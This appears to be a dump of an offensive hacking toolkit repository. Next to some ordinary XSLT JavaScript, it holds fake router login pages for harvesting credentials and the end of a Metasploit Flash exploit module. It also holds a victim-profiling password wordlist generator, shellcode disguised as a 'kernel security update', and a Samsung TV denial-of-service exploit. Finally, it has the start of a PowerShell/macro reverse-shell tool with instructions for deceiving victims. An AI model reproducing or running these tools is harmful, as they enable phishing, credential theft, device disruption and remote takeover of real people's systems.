stylesheet into an executible form. If this function is called after 480 | * the stylesheet has been compiled, it will be thrown away and recompiled. 481 | */ 482 | function xslt_InitParser(xsltDocument) 483 | { 484 | var doc = xsltDocument.getDocument(); 485 | if (this.platformMoz) { 486 | this.processor = new XSLTProcessor(); 487 | this.processor.importStylesheet(doc); 488 | } else if (this.platformIE6) { 489 | var xslTemplate = xslt_CreateActiveXTemplate(); 490 | if (!xslTemplate) { 491 | throw "No XSLT Support"; 492 | } 493 | xslTemplate.stylesheet = doc; 494 | this.processor = xslTemplate.createProcessor(); 495 | } else { 496 | throw "No XSLT Support"; 497 | } 498 | } 499 | 500 | /* 501 | * xslt_AddParameter() 502 | * Applications to call only in the 'ready' callback. 503 | */ 504 | function xslt_AddParameter(param_name, param_value) 505 | { 506 | if (this.processor != null) { 507 | if (this.platformMoz) { 508 | this.processor.setParameter(null, param_name, param_value); 509 | } else if (this.platformIE6) { 510 | this.processor.addParameter(param_name, param_value); 511 | } 512 | } 513 | } 514 | 515 | /* 516 | * xmlDataObject_dataTimeoutFunc() 517 | * retry retrieval but will timeout less frequently 518 | */ 519 | function xmlDataObject_dataTimeoutFunc() 520 | { 521 | this.timeoutMillis = this.extendedTimeoutMillis; 522 | this.retrieveData(); 523 | } 524 | 525 | function xslt_RetrieveData() 526 | { 527 | // Pass the retrieval request on to our internal data. 528 | this.data.retrieveData(); 529 | } 530 | 531 | /* 532 | * Check several versions of the MSXML XSLTemplate ActiveX object to see which are 533 | * supported. Return the most current available version, or null if none can be found. 534 | */ 535 | function xslt_CreateActiveXTemplate() 536 | { 537 | try { 538 | return new ActiveXObject("Msxml2.XSLTemplate.4.0"); 539 | } catch (e) {} 540 | try { 541 | return new ActiveXObject("Msxml2.XSLTemplate.3.0"); 542 | } catch (e) {} 543 | try { 544 | return new ActiveXObject("Msxml2.XSLTemplate"); 545 | } catch (e) {} 546 | return null; 547 | } 548 | 549 | /* 550 | * This function performs an XSLT translation. The XSLT stylesheet must already be 551 | * stored inside this xsltProcessingObject; it is an error to call this function 552 | * before being notified, via the callback passed to the constructor, that this 553 | * XSLT object has finished loading. 554 | * The xmlDoc parameter must be an XMLDOMDocument, or equivalent ActiveX object. The 555 | * ownerDocument must be supplied as well, and it must the a top-level document which 556 | * will contain the HTML generated by applying the XSLT. If the target argument is 557 | * present, then it must be a descendant of the ownerDocument as well. 558 | * The target parameter is optional, and if specified must be a DOM node to which 559 | * all elements generated by the XSLT transformation should be attached. If a target 560 | * is specified, then all nodes are appended to it as if by calls to target.appendChild(), 561 | * and no value is returned. If no target is specified, then this function makes a 562 | * "best effort" attempt to create a parent element for the nodes to live in, and 563 | * returns that node. This creation is not guaranteed to work, because there is no 564 | * single HTML element which can legally contain any other arbitrary HTML element. 565 | * As a rule, this attempted creation will usually work in Firefox, and usually fail 566 | * in Internet Explorer, so use it at your own risk. 567 | */ 568 | function xslt_Transform(xmlDoc, ownerDocument, target) 569 | { 570 | if (this.platformMoz) { 571 | var fragment = this.processor.transformToFragment(xmlDoc, ownerDocument); 572 | if (!target) { 573 | return fragment; 574 | } 575 | target.appendChild(fragment); 576 | return; 577 | 578 | /* 579 | * This section is left here to demonstrate how one could convert Firefox's 580 | * output to a string instead of converting IE's output to a node list. 581 | * It is commented out to keep it from being executed, however. 582 | */ 583 | /* 584 | var tempHolder = document.createElement("span"); 585 | tempHolder.appendChild(fragment); 586 | return tempHolder.innerHTML; 587 | */ 588 | } else if (this.platformIE6) { 589 | // Try the IE way 590 | this.processor.input = xmlDoc; 591 | this.processor.transform(); 592 | var output = this.processor.output; 593 | 594 | if (target) { 595 | if (output != null && output.length > 0) { 596 | target.innerHTML += output; 597 | } 598 | return; 599 | } 600 | 601 | var result = ownerDocument.createElement('span'); 602 | result.outerHTML = output; 603 | return result; 604 | } 605 | } 606 | 607 | /* 608 | * Create an empty DOM Document using the correct interface for the current browser. 609 | * If no suitable interface for document creation can be found, this function will 610 | * return null. 611 | */ 612 | function xslt_createEmptyDocument() 613 | { 614 | if (this.platformMoz) { 615 | /* 616 | * This is Mozilla (and others) compatible and is the preferred standard for retrieving an XML document. 617 | */ 618 | return document.implementation.createDocument("", "", null); 619 | } 620 | 621 | /* 622 | * Try IE and Opera flavours 623 | */ 624 | try { 625 | return new ActiveXObject("MSXML2.FreeThreadedDOMDocument.4.0"); 626 | } catch (e) {} 627 | try { 628 | return new ActiveXObject("MSXML2.FreeThreadedDOMDocument.3.0"); 629 | } catch (e) {} 630 | try { 631 | return new ActiveXObject("Microsoft.XMLDOM"); 632 | } catch (e) {} 633 | try { 634 | return new ActiveXObject("Msxml2.XMLHTTP"); 635 | } catch (e) {} 636 | try { 637 | return new ActiveXObject("Microsoft.XMLHTTP"); 638 | } catch (e) {} 639 | try { 640 | return new XMLHttpRequest(); 641 | } catch (e) {} 642 | return null; 643 | } 644 | 645 | function xml_data_js_loaded() { return true; } 646 | 647 | /* 648 | * We must check for XPath implementation; some browsers support it but do not 649 | * enable it by default. This code activates it if it exists. (This code is written 650 | * in the global scope so that it executes as the page loads). 651 | */ 652 | if ((typeof document.implementation == "object") && (typeof document.implementation.hasFeature == "function")) { 653 | if (document.implementation.hasFeature("XPath", "3.0")) { 654 | // Opera does not have XMLDocument 655 | if (typeof(XMLDocument) == "undefined") { 656 | XMLDocument = Document; 657 | } 658 | // prototying the XMLDocument 659 | XMLDocument.prototype.selectNodes = function(cXPathString, xNode) { 660 | if(!xNode) { 661 | xNode = this; 662 | } 663 | var oNSResolver = this.createNSResolver(this.documentElement); 664 | var aItems = this.evaluate(cXPathString, xNode, oNSResolver, XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null); 665 | var aResult = []; 666 | for (var i = 0; i < aItems.snapshotLength; i++) { 667 | aResult[i] = aItems.snapshotItem(i); 668 | } 669 | return aResult; 670 | } 671 | 672 | // prototying the Element 673 | Element.prototype.selectNodes = function(cXPathString) { 674 | if (this.ownerDocument.selectNodes) { 675 | return this.ownerDocument.selectNodes(cXPathString, this); 676 | } else { 677 | throw "For XML Elements Only"; 678 | } 679 | } 680 | } 681 | } 682 | -------------------------------------------------------------------------------- /files/Login_files/banner_left.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/Login_files/banner_left.gif -------------------------------------------------------------------------------- /files/Login_files/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Thomson Gateway - Login 5 | 6 | 7 | 8 | 9 | 13 | 14 | 305 | 306 | 307 | 308 | 342 | 343 | 344 | 345 | 412 | 413 |

309 | 310 | 311 | 339 | 340 | 341 |

346 | 347 | 348 | 409 | 410 |

349 | 350 | 351 | 406 | 407 |

352 |

353 |

354 |

355 | 356 | 357 |

358 |

359 |

Introduza o seu nome de utlizador e a sua password para aceder ao Thomson Gateway

360 | 361 | 362 | 392 |

393 |

394 |

395 | 396 | 403 | 404 |

405 |

408 |

411 |

414 | 415 | 416 | 417 | -------------------------------------------------------------------------------- /files/Login_files/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 not found 4 | 5 | 6 | 7 | 8 | 9 |

47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 |

56 | Authentication Required 57 |
58 | The server http://G4tW41:80 requires a username 59 |
60 | and password. The server says: DT 845W 61 |

62 |
Username:
Password:

86 | 87 | 88 | -------------------------------------------------------------------------------- /files/ROUTERS_DEFAULT/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 not found 4 | 5 | 6 | 7 | 8 | 9 |

146 | 147 | 148 | | 149 | 150 | return html_template, binding() 151 | end 152 | 153 | def create_swf 154 | path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf') 155 | swf = ::File.open(path, 'rb') { |f| swf = f.read } 156 | 157 | swf 158 | end 159 | end 160 | -------------------------------------------------------------------------------- /modules/changelog.nt: -------------------------------------------------------------------------------- 1 | ######################### 2 | # DONT CHANGE THIS FILE # 3 | ######################### 4 | 5 | 6 | Version :4.6 7 | Revission :30-nov-2015 8 | SSlstrip :0.9 9 | webcrawler :1.5 10 | priv8 :2.3 11 | last Video : http://www.youtube.com/watch?v=DUoBhqvtPnQ&list=PL6lei9H-Ej0KoXxkxWgNC6C30Sv8QaHUC 12 | 13 | 14 | By h4x0r :Apofis Kaizer [Debug on Mac OSx Systems] 15 | Developer :Fyodor [Nmap] 16 | Developer :ALoR & NaGa [Ettercap] 17 | Developer :HD moore [Metasploit] 18 | Developer :Moxie M [Sslstrip] 19 | Developer :Chris L [Driftnet] 20 | Developer :j0rgan [Cupp.py] 21 | Developer :ReL1K [unicorn.py] 22 | Developer :KyRecon [shellter] 23 | 24 | 25 | Web Page :http://www.backtracker.tk/ 26 | Web Page :http://www.r00tsect0r.net/ 27 | Web Page :https://www.facebook.com/Backtrack.Kali 28 | -------------------------------------------------------------------------------- /modules/cupp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #### 3 | # 4 | # [Program] 5 | # CUPP 1.0 6 | # Common User Passwords Profiler 7 | # 8 | # [Author] 9 | # Muris Kurgas aka j0rgan 10 | # jorganwd [at] gmail [dot] com 11 | # 12 | # 13 | # [License] 14 | # This program is free software; you can redistribute it and/or modify 15 | # it under the terms of the GNU General Public License as published by 16 | # the Free Software Foundation; either version 3 of the License, or 17 | # any later version. 18 | # 19 | # This program is distributed in the hope that it will be useful, 20 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 21 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 22 | # GNU General Public License for more details. 23 | # 24 | # You should have received a copy of the GNU General Public License 25 | # along with this program; if not, write to the Free Software 26 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 27 | # 28 | # See 'docs/LICENSE' for more information. 29 | ### 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | # ----------------------------- 38 | # inport libs 39 | # ----------------------------- 40 | import sys 41 | import os 42 | 43 | 44 | 45 | 46 | 47 | # ----------------------------- 48 | # script colorize output 49 | # ----------------------------- 50 | BLUE = '\033[94m' 51 | RED = '\033[91m' 52 | GREEN = '\033[32m' 53 | WHITE = '\033[0m' 54 | ORANGE = '\033[33m' 55 | BUS = '\033[34m' 56 | 57 | 58 | 59 | 60 | # ---------------------------- 61 | # framework banner 62 | # --------------------------- 63 | 64 | print "" 65 | print RED+" ,__, " 66 | print RED+" (oo)____ " 67 | print RED+" (__) )\ " 68 | print RED+" ||--|| * " 69 | print BLUE+" 'Common User Password Profiler'" 70 | print BLUE+" [Author] Muris Kurgas aka j0rgan" 71 | print "" 72 | print "" 73 | print BUS+"[*] [input target info]:"+WHITE+" to make a dictionary [low cases!]" 74 | print ORANGE+"[*] If you don't know all the info, just hit enter when asked!\r\n" 75 | 76 | 77 | 78 | 79 | 80 | 81 | # -------------------------------- 82 | # start script functions 83 | # -------------------------------- 84 | print WHITE+"" 85 | name = raw_input("> Name: ") 86 | if len(name) == 0 or name == " " or name == " " or name == " ": 87 | print RED+"\r\n[x] You must enter a name at least!" 88 | print RED+"[X] Now exiting...\r\n" 89 | print WHITE+"" 90 | sys.exit() 91 | 92 | surname = raw_input("> Surname: ") 93 | nick = raw_input("> Nickname: ") 94 | birthdate = raw_input("> Birthdate (DDMMYYYY; i.e. 04111985): ") 95 | if len(birthdate) != 0: 96 | if len(birthdate) != 8: 97 | print RED+"\r\n[x] You must enter 8 digits for birthday!" 98 | print RED+"[x] Now exiting...\r\n" 99 | print WHITE+"" 100 | sys.exit() 101 | 102 | 103 | print "" 104 | wife = raw_input("> Wife's(husband's) name: ") 105 | wifen = raw_input("> Wife's(husband's) nickname: ") 106 | wifeb = raw_input("> Wife's(husband's) birthdate (DDMMYYYY; i.e. 04111985): ") 107 | if len(wifeb) != 0: 108 | if len(wifeb) != 8: 109 | print RED+"\r\n[x] You must enter 8 digits for birthday!" 110 | print RED+"[x] Now exiting...\r\n" 111 | print WHITE+"" 112 | sys.exit() 113 | 114 | 115 | print "" 116 | kid = raw_input("> Child's name: ") 117 | kidn = raw_input("> Child's nickname: ") 118 | kidb = raw_input("> Child's birthdate (DDMMYYYY; i.e. 04111985): ") 119 | if len(kidb) != 0: 120 | if len(kidb) != 8: 121 | print RED+"\r\n[x] You must enter 8 digits for birthday!" 122 | print RED+"[X] Now exiting...\r\n" 123 | print WHITE+"" 124 | sys.exit() 125 | 126 | 127 | print "" 128 | pet = raw_input("> Pet's name: ") 129 | company = raw_input("> Company name: ") 130 | 131 | print "" 132 | words = [''] 133 | oth = raw_input("> Do you want to add some key words about the victim? [Y/N]: ") 134 | if oth == "y" or oth == "Y": 135 | words = raw_input("> Please enter the words, separated by comma. [i.e. hacker, juice, black]: ").split(", ") 136 | 137 | 138 | 139 | 140 | print BUS+"\r\n[*] [please wait]:"+WHITE+" making a dictionary..." 141 | 142 | 143 | # ---------------------------------------- 144 | # Now me must do some string modifications 145 | # ---------------------------------------- 146 | birthdate_yy = birthdate[-2:] 147 | birthdate_yyy = birthdate[-3:] 148 | birthdate_yyyy = birthdate[-4:] 149 | birthdate_xd = birthdate[1:2] 150 | birthdate_xm = birthdate[3:4] 151 | birthdate_dd = birthdate[:2] 152 | birthdate_mm = birthdate[2:4] 153 | 154 | wifeb_yy = wifeb[-2:] 155 | wifeb_yyy = wifeb[-3:] 156 | wifeb_yyyy = wifeb[-4:] 157 | wifeb_xd = wifeb[1:2] 158 | wifeb_xm = wifeb[3:4] 159 | wifeb_dd = wifeb[:2] 160 | wifeb_mm = wifeb[2:4] 161 | 162 | kidb_yy = kidb[-2:] 163 | kidb_yyy = kidb[-3:] 164 | kidb_yyyy = kidb[-4:] 165 | kidb_xd = kidb[1:2] 166 | kidb_xm = kidb[3:4] 167 | kidb_dd = kidb[:2] 168 | kidb_mm = kidb[2:4] 169 | 170 | # ---------------------------------- 171 | # Convert first letters to uppercase 172 | # ---------------------------------- 173 | nameup = name.title() 174 | surnameup = surname.title() 175 | nickup = nick.title() 176 | wifeup = wife.title() 177 | wifenup = wifen.title() 178 | kidup = kid.title() 179 | kidnup = kidn.title() 180 | petup = pet.title() 181 | companyup = company.title() 182 | wordsup = [] 183 | for words1 in words: 184 | wordsup.append(words1.title()) 185 | 186 | word = words+wordsup 187 | 188 | # ------------------------------ 189 | # reverse a name 190 | # ----------------------------- 191 | rev_name = name[::-1] 192 | rev_nameup = nameup[::-1] 193 | rev_nick = nick[::-1] 194 | rev_nickup = nickup[::-1] 195 | rev_wife = wife[::-1] 196 | rev_wifeup = wifeup[::-1] 197 | rev_kid = kid[::-1] 198 | rev_kidup = kidup[::-1] 199 | 200 | reverse = [rev_name, rev_nameup, rev_nick, rev_nickup, rev_wife, rev_wifeup, rev_kid, rev_kidup] 201 | rev_n = [rev_name, rev_nameup, rev_nick, rev_nickup] 202 | rev_w = [rev_wife, rev_wifeup] 203 | rev_k = [rev_kid, rev_kidup] 204 | 205 | # -------------------------------- 206 | # Let's do some serious work! This will be a mess of code, but... who cares? :) 207 | # -------------------------------- 208 | bds = [birthdate_yy, birthdate_yyy, birthdate_yyyy, birthdate_xd, birthdate_xm, birthdate_dd, birthdate_mm] 209 | 210 | bdss = [] 211 | 212 | for bds1 in bds: 213 | bdss.append(bds1) 214 | for bds2 in bds: 215 | if bds.index(bds1) != bds.index(bds2): 216 | bdss.append(bds1+bds2) 217 | for bds3 in bds: 218 | if bds.index(bds1) != bds.index(bds2) and bds.index(bds2) != bds.index(bds3) and bds.index(bds1) != bds.index(bds3): 219 | bdss.append(bds1+bds2+bds3) 220 | 221 | 222 | 223 | # --------------------------------- 224 | # For a woman 225 | # --------------------------------- 226 | wbds = [wifeb_yy, wifeb_yyy, wifeb_yyyy, wifeb_xd, wifeb_xm, wifeb_dd, wifeb_mm] 227 | 228 | wbdss = [] 229 | 230 | for wbds1 in wbds: 231 | wbdss.append(wbds1) 232 | for wbds2 in wbds: 233 | if wbds.index(wbds1) != wbds.index(wbds2): 234 | wbdss.append(wbds1+wbds2) 235 | for wbds3 in wbds: 236 | if wbds.index(wbds1) != wbds.index(wbds2) and wbds.index(wbds2) != wbds.index(wbds3) and wbds.index(wbds1) != wbds.index(wbds3): 237 | wbdss.append(wbds1+wbds2+wbds3) 238 | 239 | 240 | 241 | # --------------------------------- 242 | # and a child 243 | # --------------------------------- 244 | kbds = [kidb_yy, kidb_yyy, kidb_yyyy, kidb_xd, kidb_xm, kidb_dd, kidb_mm] 245 | 246 | kbdss = [] 247 | 248 | for kbds1 in kbds: 249 | kbdss.append(kbds1) 250 | for kbds2 in kbds: 251 | if kbds.index(kbds1) != kbds.index(kbds2): 252 | kbdss.append(kbds1+kbds2) 253 | for kbds3 in kbds: 254 | if kbds.index(kbds1) != kbds.index(kbds2) and kbds.index(kbds2) != kbds.index(kbds3) and kbds.index(kbds1) != kbds.index(kbds3): 255 | kbdss.append(kbds1+kbds2+kbds3) 256 | 257 | 258 | # --------------------------------- 259 | # string combinations 260 | # --------------------------------- 261 | kombinaac = [pet, petup, company, companyup] 262 | 263 | kombina = [name, surname, nick, nameup, surnameup, nickup] 264 | 265 | kombinaw = [wife, wifen, wifeup, wifenup, surname, surnameup] 266 | 267 | kombinak = [kid, kidn, kidup, kidnup, surname, surnameup] 268 | 269 | kombinaa = [] 270 | for kombina1 in kombina: 271 | kombinaa.append(kombina1) 272 | for kombina2 in kombina: 273 | if kombina.index(kombina1) != kombina.index(kombina2) and kombina.index(kombina1.title()) != kombina.index(kombina2.title()): 274 | kombinaa.append(kombina1+kombina2) 275 | 276 | kombinaaw = [] 277 | for kombina1 in kombinaw: 278 | kombinaaw.append(kombina1) 279 | for kombina2 in kombinaw: 280 | if kombinaw.index(kombina1) != kombinaw.index(kombina2) and kombinaw.index(kombina1.title()) != kombinaw.index(kombina2.title()): 281 | kombinaaw.append(kombina1+kombina2) 282 | 283 | kombinaak = [] 284 | for kombina1 in kombinak: 285 | kombinaak.append(kombina1) 286 | for kombina2 in kombinak: 287 | if kombinak.index(kombina1) != kombinak.index(kombina2) and kombinak.index(kombina1.title()) != kombinak.index(kombina2.title()): 288 | kombinaak.append(kombina1+kombina2) 289 | 290 | 291 | 292 | # inserting some years, you can add more if you want... 293 | years = ['2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010'] 294 | # and some random numbers to make a pwnsauce.., :) 295 | def concats(seq, start, stop): 296 | for mystr in seq: 297 | for num in xrange(start, stop): 298 | yield mystr + str(num) 299 | 300 | 301 | 302 | 303 | # ----------------------------------- 304 | # now sorting and making combinations 305 | # ----------------------------------- 306 | def komb(seq, start): 307 | for mystr in seq: 308 | for mystr1 in start: 309 | yield mystr + mystr1 310 | 311 | komb1 = list(komb(kombinaa, bdss)) 312 | komb2 = list(komb(kombinaaw, wbdss)) 313 | komb3 = list(komb(kombinaak, kbdss)) 314 | komb4 = list(komb(kombinaa, years)) 315 | komb5 = list(komb(kombinaac, years)) 316 | komb6 = list(komb(kombinaaw, years)) 317 | komb7 = list(komb(kombinaak, years)) 318 | komb8 = list(komb(word, bdss)) 319 | komb9 = list(komb(word, wbdss)) 320 | komb10 = list(komb(word, kbdss)) 321 | komb11 = list(komb(word, years)) 322 | # adding random numbers from 0 to 1000, you can change this... 323 | komb12 = list(concats(word, 0, 1000)) 324 | komb13 = list(concats(kombinaa, 0, 1000)) 325 | komb14 = list(concats(kombinaac, 0, 1000)) 326 | komb15 = list(concats(kombinaaw, 0, 1000)) 327 | komb16 = list(concats(kombinaak, 0, 1000)) 328 | komb17 = list(komb(reverse, years)) 329 | komb18 = list(komb(rev_w, years)) 330 | komb19 = list(komb(rev_k, kbdss)) 331 | komb20 = list(komb(rev_n, bdss)) 332 | komb21 = list(concats(reverse, 0, 1000)) 333 | 334 | print BUS+"[*]"+WHITE+" Sorting list and removing duplicates..." 335 | 336 | komb_unique1 = dict.fromkeys(komb1).keys() 337 | komb_unique2 = dict.fromkeys(komb2).keys() 338 | komb_unique3 = dict.fromkeys(komb3).keys() 339 | komb_unique4 = dict.fromkeys(komb4).keys() 340 | komb_unique5 = dict.fromkeys(komb5).keys() 341 | komb_unique6 = dict.fromkeys(komb6).keys() 342 | komb_unique7 = dict.fromkeys(komb7).keys() 343 | komb_unique8 = dict.fromkeys(komb8).keys() 344 | komb_unique9 = dict.fromkeys(komb9).keys() 345 | komb_unique10 = dict.fromkeys(komb10).keys() 346 | komb_unique11 = dict.fromkeys(komb11).keys() 347 | komb_unique12 = dict.fromkeys(komb12).keys() 348 | komb_unique13 = dict.fromkeys(komb13).keys() 349 | komb_unique14 = dict.fromkeys(komb14).keys() 350 | komb_unique15 = dict.fromkeys(komb15).keys() 351 | komb_unique16 = dict.fromkeys(komb16).keys() 352 | komb_unique17 = dict.fromkeys(komb17).keys() 353 | komb_unique18 = dict.fromkeys(komb18).keys() 354 | komb_unique19 = dict.fromkeys(komb19).keys() 355 | komb_unique20 = dict.fromkeys(komb20).keys() 356 | komb_unique21 = dict.fromkeys(komb21).keys() 357 | komb_unique01 = dict.fromkeys(kombinaa).keys() 358 | komb_unique02 = dict.fromkeys(kombinaac).keys() 359 | komb_unique03 = dict.fromkeys(kombinaaw).keys() 360 | komb_unique04 = dict.fromkeys(kombinaak).keys() 361 | komb_unique05 = dict.fromkeys(word).keys() 362 | 363 | uniqlist = bdss+wbdss+kbdss+reverse+komb_unique01+komb_unique02+komb_unique03+komb_unique04+komb_unique05+komb_unique1+komb_unique2+komb_unique3+komb_unique4+komb_unique5+komb_unique6+komb_unique7+komb_unique8+komb_unique9+komb_unique10+komb_unique11+komb_unique12+komb_unique13+komb_unique14+komb_unique15+komb_unique16+komb_unique17+komb_unique18+komb_unique19+komb_unique20+komb_unique21 364 | 365 | unique_list = dict.fromkeys(uniqlist).keys() 366 | 367 | 368 | f = open ( name+'.txt', 'w' ) 369 | f.write (os.linesep.join(unique_list)) 370 | f.close() 371 | 372 | lines = 0 373 | fcount = open ( name+'.txt', 'r' ) 374 | for line in fcount: 375 | lines += 1 376 | 377 | fcount.close() 378 | 379 | print BUS+"[*]"+WHITE+" Saving dictionary to "+GREEN+"[opensource/logs/"+name+".txt]"+WHITE+", counting "+GREEN+"["+str(lines)+"]"+WHITE+" words." 380 | print BUS+"[*]"+WHITE+" Now load your pistolero with "+GREEN+"["+name+".txt]"+WHITE+" and shoot! Good luck!" 381 | print WHITE+"" 382 | print WHITE+"" 383 | 384 | # --------------------------- 385 | # end of file 386 | # --------------------------- 387 | -------------------------------------------------------------------------------- /modules/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/modules/database.db -------------------------------------------------------------------------------- /modules/exec.c: -------------------------------------------------------------------------------- 1 | //C-INJECTOR by: [ r00t-3xp10it ] inject shellcode into 2 | //one 'C' function (exec.c) to make it executable, paste your 3 | //shellcode in 'C' format just bellow 'unsigned char buf[] =' 4 | //replacing the existing shellcode by our own... 5 | 6 | 7 | #include 8 | #include 9 | 10 | 11 | unsigned char buf[] = 12 | "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" 13 | "\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; 14 | 15 | 16 | 17 | main() 18 | { 19 | 20 | printf("\nPlease Wait, updating system...\nPatching kernel with latest security updates.\nShellcode Length: %d", strlen(buf)); 21 | 22 | int (*ret)() = (int(*)())buf; 23 | 24 | ret(); 25 | } 26 | 27 | -------------------------------------------------------------------------------- /modules/msf.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/modules/msf.swf -------------------------------------------------------------------------------- /modules/samsung_reset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # Exploit Title: Samsung TV Denial of Service (DoS) Attack 4 | # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com 5 | # Rec0ded by: pedr0 ubuntu aka r00t-3xp10it 6 | # 7 | # Date: 07/21/2013 8 | # CVE Number: CVE-2013-4890 9 | # Vendor Homepage: http://www.samsung.com 10 | # 11 | # Description: 12 | # The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long 13 | # HTTP GET request As a results, the TV reboots... 14 | # Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :) 15 | # 16 | ### 17 | 18 | 19 | 20 | # ---------------------------- 21 | # import dependencies 22 | # ---------------------------- 23 | import httplib 24 | import time 25 | import sys 26 | import os 27 | import time 28 | 29 | 30 | 31 | # ---------------------------- 32 | # script colorize output 33 | # ---------------------------- 34 | BLUE = '\033[94m' 35 | RED = '\033[91m' 36 | GREEN = '\033[32m' 37 | WHITE = '\033[0m' 38 | ORANGE = '\033[33m' 39 | 40 | 41 | 42 | # ---------------------------- 43 | # exploit banner 44 | # ---------------------------- 45 | print BLUE+"**************************************************************" 46 | print WHITE+" Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com" 47 | print WHITE+" Exploit: Denial of Service (DoS) attack" 48 | print WHITE+" Rec0ded by: pedr0 ubuntu aka r00t-3xp10it" 49 | print "" 50 | print WHITE+" Description:" 51 | print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600" 52 | print WHITE+" is crashing by sending a long HTTP GET request." 53 | print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)" 54 | print BLUE+"**************************************************************" 55 | 56 | 57 | 58 | 59 | # ---------------------------- 60 | # Sends the payload 61 | # ---------------------------- 62 | print "" 63 | print BLUE+"[*]"+GREEN+" press ctrl+z to stop" 64 | print BLUE+"[*]"+WHITE+" Sending the malicious payload..." 65 | conn = httplib.HTTPConnection(sys.argv[1],5600) 66 | conn.request("GET", "A"*300) 67 | conn.close() 68 | 69 | # ---------------------------- 70 | # Checks the response 71 | # ---------------------------- 72 | print BLUE+"[*]"+WHITE+" Checking the status..." 73 | response = 0 74 | while response == 0: 75 | response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") 76 | if response != 0: 77 | print BLUE+"[*]"+GREEN+" (Success):"+RED+" the target seems to be down !!!" 78 | print WHITE+"" 79 | time.sleep(10) 80 | 81 | 82 | -------------------------------------------------------------------------------- /modules/unicorn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # Magic Unicorn - PowerShell downgrade attack and exploitation tool 4 | # 5 | # Written by: Dave Kennedy (@HackingDave) 6 | # Company: TrustedSec (@TrustedSec) https://www.trustedsec.com 7 | # 8 | # Real quick down and dirty for native x86 powershell on any platform 9 | # 10 | # Usage: python unicorn.py payload reverse_ipaddr port 11 | # Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 12 | # Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro 13 | # HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta 14 | # 15 | # Requirements: Need to have Metasploit installed. 16 | # 17 | # Special thanks to Matthew Graeber and Josh Kelley 18 | # 19 | import base64 20 | import re 21 | import subprocess 22 | import sys 23 | import os 24 | import shutil 25 | 26 | 27 | class ColorsEnum: 28 | CYAN = '\033[96m' 29 | BLUE = '\033[94m' 30 | RED = '\033[91m' 31 | BOLD = '\033[1m' 32 | ENDC = '\033[0m' 33 | 34 | 35 | # display unicorn banner 36 | def gen_unicorn(): 37 | print r""" 38 | ,/ 39 | // 40 | ,// 41 | ___ /| |// 42 | `__/\_ --(/|___/-/ 43 | \|\_-\___ __-_`- /-/ \. 44 | |\_-___,-\_____--/_)' ) \ 45 | \ -_ / __ $ `( __`\| 46 | `\__| |""" + ColorsEnum.RED + r"""$\ """ + ColorsEnum.ENDC + r""") """ + ColorsEnum.RED + r"""/(/""" + ColorsEnum.ENDC + r"""| 47 | ,._____., ',--//-| \ | ' / 48 | / __. \, / /,---| \ / 49 | / / _. \ \ `/`_/ _,' | | 50 | | | ( ( \ | ,/\'__/'/ | | 51 | | \ \`--, `_/_------______/ \( )/ 52 | | | \ \_. \, \___/\ 53 | | | \_ \ \ \ 54 | \ \ \_ \ \ / \ 55 | \ \ \._ \__ \_| | \ 56 | \ \___ \ \ | \ 57 | \__ \__ \ \_ | \ | 58 | | \_____ \ ____ | | 59 | | \ \__ ---' .__\ | | | 60 | \ \__ --- / ) | \ / 61 | \ \____/ / ()( \ `---_ /| 62 | \__________/(,--__ \_________. | ./ | 63 | | \ \ `---_\--, \ \_,./ | 64 | | \ \_ ` \ /`---_______-\ \\ / 65 | \ \.___,`| / \ \\ \ 66 | \ | \_ \| \ ( |: | 67 | \ \ \ | / / | ; 68 | \ \ \ \ ( `_' \ | 69 | \. \ \. \ `__/ | | 70 | \ \ \. \ | | 71 | \ \ \ \ ( ) 72 | \ | \ | | | 73 | | \ \ \ I ` 74 | ( __; ( _; ('-_'; 75 | |___\ \___: \___: 76 | """ 77 | 78 | 79 | # display macro help 80 | def macro_help(): 81 | print """ 82 | [*******************************************************************************************************] 83 | 84 | -----MACRO ATTACK INSTRUCTIONS---- 85 | 86 | For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do 87 | that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code 88 | into that. This will automatically run. Note that a message will prompt to the user saying that the file 89 | is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the 90 | victim to thinking the excel document is corrupted. You should get a shell 